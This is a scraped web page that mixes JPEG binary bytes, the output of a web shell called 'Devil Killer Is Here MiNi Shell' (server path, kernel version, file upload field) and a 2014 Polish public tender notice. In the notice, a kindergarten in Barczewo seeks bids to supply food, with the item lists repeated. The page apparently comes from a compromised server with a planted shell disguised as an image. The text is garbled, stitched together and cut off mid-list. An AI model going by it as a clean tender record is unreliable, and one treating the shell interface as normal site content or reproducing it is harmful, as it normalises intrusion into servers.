JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141127/389712-N-2014.html

<p class="kh_header"><b>Barczewo: ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE</b><br>
<b>Numer ogłoszenia: 389712 - 2014; data zamieszczenia: 27.11.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole Miejskie w Barczewie , ul. Słowackiego 7, 11-010 Barczewo, woj. warmińsko-mazurskie, tel. 89 5148396, faks 89 5148396.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP DOSTAWA I ROZŁADUNEK ARTYKUŁÓW SPOŻYWCZYCH NA POTRZEBY PRZEDSZKOLA MIEJSKIEGO W BARCZEWIE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje 6 części PM.271.2.2014 CZĘŚĆ 1. Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego               w Barczewie
Artykuły ogólnospożywcze  CPV : 15.60.00.00-4;15.80.00.00.-6;15.82.00.00.-2;15.83.00.00-5;15.84.00.00-8;15.85.00.00.-1;  15.86.00-4;15.87.00.00-7;15.89.00.00-3;15.98.00.00-1;15.40.00.00.-2;15.33.00.00-0;03.14.25.00-3;
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	13000
2.	Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna	kg	340
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	75
4.	Płatki owsiane op500g	Kg	95
5.	Płatki jęczmienne op500g	Kg	45
6.	Kasza manna 1000g	Kg	50
7.	Kasza kukurydziana op.250-500g	Kg	60
8.	Kasza jaglana op.400-500g	Kg	48
9.	Kasza  jęczmienna średnia op.400-500g	Kg	110
10.	Kasza gryczana prażona op.400-1000g	Kg	150
11.	Kasza pęczak op.400-500g	Kg	10
12.	Mąka pszenna typ 550op.1000g	Kg	700
13.	Mąka ziemniaczana op.500-1000g	Kg	10
14.	Płatki ryżowe op.250-500g	Kg	50
15.	Ryż biały długoziarnisty op.1000g	Kg	300
16.	Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	85
17.	Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	27
18.	Cukier biały kryształ,pakowany op.1000g	Kg	1200
19.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	600
20.	Koncentrat pomidorowy30% op.co najmniej 190g	Szt	620
21.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	250
22.	Sól morska drobnaop.1000g	Kg	15
23.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	120
24.	Kakao prawdziwe op.100-200g	Kg	12
25.	Budyń w proszku różne smaki op.waga co najmniej 40g	Szt	800
26.	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	1000
27.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	340
28.	Olej słonecznikowy op.900-1000g	L	100
29.	Makaron pełnoziarnisty op.500g	Kg	220
30.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25x50g szt	Szt	220
31.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	25
32.	Herbata granulowanaop.100g	Szt	160
33.	Krakersy	Kg	20
34.	Biszkopty op.250-500g	Kg	130
35.	Ciastka kruche różne rodzaje op.od 1000-4000g	Kg	80
36.	Ciastka typu markizy op.co najmniej 1000g	Kg	30
37.	Woda źródlana niegazowana pakowana op.1500-5000g	L	1000
38.	Keczup pomidorowy,łagodny w słoiku op.200g 60-65% koncentratu pom.	Szt	350
39.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	150
40.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
41.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	40
42.	Liść laurowy w oryginalnych opakowaniach	Szt	40
43.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	18
44.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	40
45.	Kukurydz konserwowa puszka op.400g	Szt	40
46.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
47.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	25
48.	Koncentrat barszczu czerwonego w op. Szklanych op co najmniej 330g	szt	50
49.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	30
50.	Papryka mielona słodka w oryginalnych op.16g	Szt	80
51.	Przyprawa Curry op.20g	Szt	30
52.	Przyprawa Kurkuma  op.10-20g	Szt	30
53.	Majeranek otarty waga co najmniej 6g	szt	80
54.	Wafle suche prostokątne waga co najmniej 146g	Szt	350
55.	Nutella w oryginalnych op.600g lub produkt równoważny.	Szt	36
56.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	50
57.	Cukier waniliowy	szt	80
58.	Kwasek cytrynowyop.20g	Szt	65
59.	Musztarda słoik op.co najmniej 180g	szt	50
60.	Miód naturalny wielokwiatowy op.370g	Szt	70
61.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	30
62.	Czekolada mleczna 100g	Szt	250
63.	Cukierki czekoladowe typu michałki lub równoważne	Kg	20
64.	Proszek do pieczenia	Szt 	10
65.	Sok owocowo-warzywny op.co najmniej 700ml	L	700
66.	Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml	szt	180
67.	Makrela w sosie pomidorowym bez warzyw op co najmnie 200g	Szt	100
68.	  Sałatka z makreli op co najmniej 150g	Szt	150
69.	Cukier puder op.co najmniej 500g	Kg	10
70.	Tymianek suszony waga co najmniej10g	Szt	30
71.	Oregano suszone waga co najmniej 10g	Szt	30
72	Fasola czerwona w puszce waga co najmniej 400g	szt	100
73	Olej z pierwszego tłoczenia rzepakowy z dodatkami(czosnek,bazylia,pomidory)op.co najmniej0,25l	L	25
74	Galaretka owocowa w proszku op.co najmniej75g	szt	60
75	Pomidory w puszce( z otwieraczem) op.co najmniej 400g	szt	60
76	Kawa zbożowa sypana op.co najmniej 200g	szt	30
77	Wafelki różne smaki(kakaowe,śmietankowe)	kg	18
78	Drożdże świeże	kg	5
79	Płatki jaglane błyskawiczne op.250-500g	kg	15
80	Brzoskwinie w puszce	szt	20
81	Makaron łazanki op.400-500g	kg	30
82	Ryż brązowy op.400-1000g	kg	60
			
			
			

CZĘŚĆ 2. Zakup, dostawa i rozładunek  mięsa i jego przetworów dla Przedszkola Miejskiego w Barczewie                                        CPV: 15.10.00.00-9;15.11.21.00-7
Nazwa asortymentu  

Lp. 		Jednostka miary	Ilość
1.	Karkówka surowa wieprzowa bez kości	Kg	340
2.	Łopatka wieprzowa surowa bez kości	Kg	1000
3.	Wołowina surowa ligawa	Kg	170
4.	Szynka wieprzowa surowa bez kości,bez skóry	Kg	150
5.	Filet z indyka surowy	Kg	150
6.	Filet z kurczaka surowy	Kg	350
7.	Schab bez kości surowy wieprzowy	Kg	110
8.	Udka bez grzbietu z kurczaka surowe	Kg	350
9.	Antrykot wołowy surowy	Kg	50
10.	Żebra wołowe surowe	Kg	50
11.	Porcje rosołowe z kurczaka	Kg	120
12.	Wątróbka drobiowa surowa	Kg	80
13.	Parówki wp. cienkie o zwartości co najmniej71% mięsa wp.	Kg	180
14.	Parówki drobiowe cienkie o zawartości mięsa co najmniej 60%	Kg	100
15.	Polędwica sopocka	kg	100
16.	Szynka wędzona parzona  mieso wp. 100%	kg	30
17.	Kiełbasa żywiecka sucha 	Kg	90
18.	Kiełbasa szynkowa drobiowa o zawartości mięsa co najmniej 60%baton	Kg	20
19.	Kiełbasa krakowska sucha	Kg	50
20.	Kiełbasa wp. cienka zawierajaca  co najmniej 63% mięsa wp.	kg	80
21.	Filet wędzony z indyka o zawartości mięsa co najmiej 90%	Kg	70
22.	Kiełbasa szynkowa wp. parzona	Kg	100
23.	Łopatka pieczona zawartość mięsa co najmniej 90%	kg	30
24.	Pasztet pieczony drobiowy zawierający co najmniej30% mięsa z kury	kg	40
25	Pasztet pieczony wp zawierający co najmniej 30% mięsa wp.	kg	30
26	Szynka wp.gotowana  o zawartości mięsa co najmniej 80%	kg	120
27	Szynka wiejska	kg	80
28	Smalec wp. kostka 200-250g	Kg	30
29	Boczek wędzony parzony	Kg	20
			



CZĘŚĆ 3. Zakup, dostawa i rozładunek ziemniaków,warzyw,jarzyn,owoców, owoców tropikalnych,orzechów.
CPV:  03.20.00.00-3; 0,.22.00.00-9;03.22.21.10-7	180
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Ziemniaki 	kg	9000
2.	Marchew świeża korzeń	kg	1200
3.	Pietruszka świeża korzeń	kg	320
4.	Cebula biała	kg	180
5.	Cebula czerwona	kg	40
6.	Seler świeży korzeń	kg	280
7.	Por świeży	kg	220
8.	Kapusta czerwona świeża	kg	180
9.	Pieczarki świeże 	kg	100
10.	Czosnek kraj pochodzenie polska głowka 	szt	100
11.	Szczypior świeży pęczek	szt	850
12.	Rzodkiewka pęczek	szt	750
13.	Rzodkiew biała świeża	Kg	60
14	Sałata lodowa ,pakowana główka	szt	240
15	Sałata  zielona świeża główka	Szt	600
16	Pomidory czerwone, świeże	kg	500
17	Ogórek św.szklarniowy	kg	350
18	Ogórek swieży,zielony gruntowy	kg	100
19	Ogórek kwaszony	Kg	80
20	Kapusta kwaszona biała	kg	250
21	Kapusta pekinska 	kg	100
22	Kapusta biała słodka  główka	kg	300
23	Papryka czerwona ,żółta,zielona	kg	100
24	Cytryna świeża	Kg	100
25	Jabłka świeże	kg	3200
26	Banany świeże	kg	1000
27	Gruszki świeże	kg	500
28	kiwi	Kg	60
29	Mandarynki  świeże	kg	540
30	Winogrona zielone bezpestkowe	kg	180
31	Śliwka fioletowa duża	kg	100
32	Brzoskwinie	kg	120
33	Winogrona granatowe	kg	40
34	Koper zielony,świeży pęczek 100g	Szt	800
35	Natka pietruszki świeza pęczek  100g	szt	800
36	Burak czerwony świeży	Kg	600
37	Rodzynki op.co najmniej 100g-150g	kg	5
38	Orzechy włoskie łuskane op.co najmniej100g	kg	5
39	Fasola sucha średnia  op.400-1000g	Kg	30
40	Groch połówki op. 400-1000g	kg	30
41	Pietruszka suszona natka op.50-100g	kg	4
42	Włoszczyzna suszona op.100-200g	kg	4
43	Koper zielony suszony op 50-100g	kg	3
44	Pestki słonecznika op.50-150g	kg	8
45	Żurawina suszona op.250-500g	kg	8
46	Kalafior świeży w sezonie	szt	60
47	Brokuły świeze (w sezonie)	szt	60
48	Kapusta młoda( w sezonie)	kg	40
49	Młode ziemniaki(w sezonie)	kg	300
50	Botwinka (w sezonie)	pęcz	80
51	Cebulka suszona op.50-100g	kg	3
			





 
CZĘŚĆ 4. Zakup, dostawa i rozładunek  mrożonek dla Przedszkola Miejskiego w Barczewie(ryby przetworzone,warzywa i owoce mrożone) PCV 15.20.00.00-0;15.33.11.70-9,15.89.60.00-5;15.89.43.00-4)                                    
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1	Włoszczyzna4-składnikowa(marchew,por,seler,pietruszka)op.2000-2500g)	kg	2000
2.	Mieszanka 7-składnikowa z kapusta 2000-2500g	kg	160
3.	Brokuły mrożone 450g-2500g	kg	400
4.	Kalafior mrożony op.450-2500g	kg	400
5	Fasolka szparagowa żółta cięta op.450-2500g	kg	200
6	Fasolka szparagowa zielona cieta op.450-2500g	kg	200
7	Szpinak mrożony mielony.op.450-2500g	Kg	100
8 	Groszek zielony mrożony op.450-2500g	kg	60
9	Barszcz ukraiński skład:burak (ćwikłowy,kapusta,fasola,marchew,pomidor,seler,cebula)op.450-2500g	kg	60
10	Mieszanka kompotowa 5-składnikowa z truskawką op.450-2500g 	Kg	500
11	Mieszanka kompotowa 5-składnikowa(ananas,porzeczka czerwona,porzeczka czarna,rabarbar,truskawka) lub równoważna	kg	500
12	Truskawka mrożona op.450-2500g	Kg	250
13	Bukiet warzyw (brokuł,kalafior,marchew)op.450-2500g	Kg	230
14	Warzywa na patelnie (skład:cukinia,fasola,kalafior romanescu,marchew,papryka,cebula,kukurydza)op.450-2500g	kg	150
15	Marchew kostka op.450-2500g	kg	340
16	Marchew z groszkiem op.450-2500g	Kg	250
17	Wiśnia b)p op.450-2500g	Kg	100
18	Porzeczka czarna mrożona op.450-2500g	kg	80
19	Dorsz filet SHP	kg	250
20	Miruna filet SHP	kg	180
21	Morszczuk filet SHP	kg	80
22	Panga filet	kg	30
23	Makrela wędzona	Kg	55
24	Włoszczyzna 3-składnikowa paski op.450-2500g	Kg	130
25	Pyzy z mięsem op.500-1000g mrożone	kg	50
26	Pierogi z truskawkami op.500-1000g mrożone	kg	50
27 	Ryba sola filet mrożona	kg	30
28	Pierogi z jagodami mrożone op500-1000g	kg	50
29	Mieszanka kompotowa z owoców leśnych op2000-2500g	kg	500
30	Dorada filet	kg	60

CZĘŚĆ 5. Zakup, dostawa i rozładunek produktów mleczarskich do Przedszkola Miejskiego w Barczewie PCV 15.50.00.00-3

Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Mleko folia 2%op.1000ml	L	12500
2.	Serek topiony o smaku śmietankowym kostka 100g	szt	600
3.	Mleko UHT op.1000ml 2%	L	200
4.	Mleko UHT op.1000ml 3,2%	L	200
5.	Masło ekstra zawierajace co najmniej 82% tłuszczu	kg	530
6.	Jogurt wielosmakowy,waga op.co najmniej150g	szt	3800
7.	Serek homogenizowany wanilia op.co najmniej 135g	szt	1275
8.	 Deser waniliowy pakowany op. co najmniej120g	szt	250
9.	Jogurt z kawałkami owoców,waga op.co najmnie150g	szt	800
10.	Jogurt owocowy  do picia   op.co najmniej   125 ml	L	156
11	Ser żółty  typu salami  (nie dopuszcza się produktu seropodobnego)	kg	75
12	Ser żółty typu gouda (nie dopuszcza się produktu seropodobnego)	kg	80
13	Śmietana 12% op.200-400g	L	450
14	Śmietana 18% op.200-400g	L	260
15	Twaróg krajanka półtłusty	kg	900
16	Jogurt naturalny op. co najmniej 400ml	L	300
17	Serek topiony kostka 100g z szynką	Szt 	90

CZĘŚĆ 6. Zakup, dostawa i rozładunek pieczywa dla Przedszkola Miejskiego w Barczewie PCV :15.81.00.00-9
Lp. 	Nazwa asortymentu  	Jednostka miary	Ilość
1.	Chleb pszenno-żytni krojony foliowany waga co najmniej500g	Szt.	2450
2	Chleb razowy krojony foliowany waga co najmniej  400g	szt	2350
3	Bułki kajzerki waga co najmniej 50g	szt	3500
4	Bułka grahamka waga co najmniej 50-90g	szt	2000
5	Chleb wieloziarnisty zawartość minimum 3-ziarna(siemię lniane,słonecznik obowiązkowo,pozostałe dowolne) waga co najmniej 400-500g	szt	550
6	Ciasto drożdżowe	kg	220
7	Chałka zdobna co najmniej 300g	szt	580
8	Babka piaskowa	Kg	140
9	Rogaliki krucho -drożdżowe nadziewane	kg	250
10	Bułki  maślane waga co najmniej 50g	szt	1000
11	Bułki czerstwe  waga co najmniej waga 50g	szt	1000
12	Bułka tarta	kg	120
13	Chleb wiejski krojony	szt	200
14	Piernik przekładany	Kg	56
15	Chleb żytni krojony	szt	250
16	Paszteciki z kapustą i grzybami	szt	500
17	Rolada biszkoptowa z galaretka	kg	230
18	Pączki z marmoladą	szt	250
19	Rogale z makiem waga co najmniej 50g	szt	400.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.01.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkolebarczewo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miejskie w Barczewie ul. Słowackiego 7, 11-010 Barczewo, pokój nr 104 w godz. 8.00 - 13.00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2014 godzina 10:00, miejsce: Przedszkole Miejskie w Barczewie ul. Słowackiego 7, 11-010 Barczewo, pokój nr 104.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup, dostawa i rozładunek artykułów żywnościowych dla Przedszkola Miejskiego w Barczewie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Jaja kurze z chowu wolnowybiegowego klasa L	Szt	13000
2.	Makaron różne kształty w oryginalnych opakowaniach od400do500g pszenica zwyczjna	kg	340
3.	Makaron drobny gwiazdki,muszelkiop.250-500g	Kg	75
4.	Płatki owsiane op500g	Kg	95
5.	Płatki jęczmienne op500g	Kg	45
6.	Kasza manna 1000g	Kg	50
7.	Kasza kukurydziana op.250-500g	Kg	60
8.	Kasza jaglana op.400-500g	Kg	48
9.	Kasza  jęczmienna średnia op.400-500g	Kg	110
10.	Kasza gryczana prażona op.400-1000g	Kg	150
11.	Kasza pęczak op.400-500g	Kg	10
12.	Mąka pszenna typ 550op.1000g	Kg	700
13.	Mąka ziemniaczana op.500-1000g	Kg	10
14.	Płatki ryżowe op.250-500g	Kg	50
15.	Ryż biały długoziarnisty op.1000g	Kg	300
16.	Płatki kukurydziane zwykłe zawierające co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	85
17.	Płatki kukurydziane miodowe zawierajace co najmniej 90% mąki kukurydzianej op.250-1000g	Kg	27
18.	Cukier biały kryształ,pakowany op.1000g	Kg	1200
19.	Dżem niskosłodzony różne smaki op.co najmniej370g	Szt	600
20.	Koncentrat pomidorowy30% op.co najmniej 190g	Szt	620
21.	Sól kuchenna jodowana biała,drobna op.1000g	Kg	250
22.	Sól morska drobnaop.1000g	Kg	15
23.	Kawa zbożowa rozpuszczalna składzboża72%(Jęczmień,żyto),cykoria,burak cukrowy-prażone.Op 150g	Szt	120
24.	Kakao prawdziwe op.100-200g	Kg	12
25.	Budyń w proszku różne smaki op.waga co najmniej 40g	Szt	800
26.	Kisiel owocowy w proszku bez cukru różne smaki waga co najmniej 40g	Szt	1000
27.	Olej z pierwszego tłoczenia rzepakowy op.900-1000g	L	340
28.	Olej słonecznikowy op.900-1000g	L	100
29.	Makaron pełnoziarnisty op.500g	Kg	220
30.	Herbata owocowa,saszetki,pakowanaop.co najmniej 25x50g szt	Szt	220
31.	Herbata miętowa saszetki ,pakowana op.co najmniej20szt	Szt	25
32.	Herbata granulowanaop.100g	Szt	160
33.	Krakersy	Kg	20
34.	Biszkopty op.250-500g	Kg	130
35.	Ciastka kruche różne rodzaje op.od 1000-4000g	Kg	80
36.	Ciastka typu markizy op.co najmniej 1000g	Kg	30
37.	Woda źródlana niegazowana pakowana op.1500-5000g	L	1000
38.	Keczup pomidorowy,łagodny w słoiku op.200g 60-65% koncentratu pom.	Szt	350
39.	Pieprz mielony prawdziwy bez dodatków w oryginalnych op.co najmniej 15g	Szt	150
40.	Pieprz ziołowy w oryginalnych opakowaniach	Szt	90
41.	Ziele angielskie w oryginalnych opakowaniach op.co najmniej14g	Szt	40
42.	Liść laurowy w oryginalnych opakowaniach	Szt	40
43.	Majonez słoik op.850g Skład: co najmniej 83% oleju rzepakowego.	szt	18
44.	Ogórek konserwowy w oryginalnych opakowaniach 0,9l słoik	Szt	40
45.	Kukurydz konserwowa puszka op.400g	Szt	40
46.	Szczaw krojony w oryginalnych opakowaniach waga co najmniej330g	szt	25
47.	Chrzan tarty słoik op.co najmniej170gz kwaskiem cytrynowym	Szt	25
48.	Koncentrat barszczu czerwonego w op. Szklanych op co najmniej 330g	szt	50
49.	Groszek konserwowy w puszce w oryginalnych op.400g	Szt	30
50.	Papryka mielona słodka w oryginalnych op.16g	Szt	80
51.	Przyprawa Curry op.20g	Szt	30
52.	Przyprawa Kurkuma  op.10-20g	Szt	30
53.	Majeranek otarty waga co najmniej 6g	szt	80
54.	Wafle suche prostokątne waga co najmniej 146g	Szt	350
55.	Nutella w oryginalnych op.600g lub produkt równoważny.	Szt	36
56.	Zioła prowansalskie w oryginalnych opakowaniach op.10g	szt	50
57.	Cukier waniliowy	szt	80
58.	Kwasek cytrynowyop.20g	Szt	65
59.	Musztarda słoik op.co najmniej 180g	szt	50
60.	Miód naturalny wielokwiatowy op.370g	Szt	70
61.	Ananas plastry puszka waga bez odcieku co najmniej 565g	szt	30
62.	Czekolada mleczna 100g	Szt	250
63.	Cukierki czekoladowe typu michałki lub równoważne	Kg	20
64.	Proszek do pieczenia	Szt 	10
65.	Sok owocowo-warzywny op.co najmniej 700ml	L	700
66.	Syrop owocowy 62%ekstraktu owocowego butelka szklana op.co najmniej420ml	szt	180
67.	Makrela w sosie pomidorowym bez warzyw op co najmnie 200g	Szt	100
68.	  Sałatka z makreli op co najmniej 150g	Szt	150
69.	Cukier puder op.co najmniej 500g	Kg	10
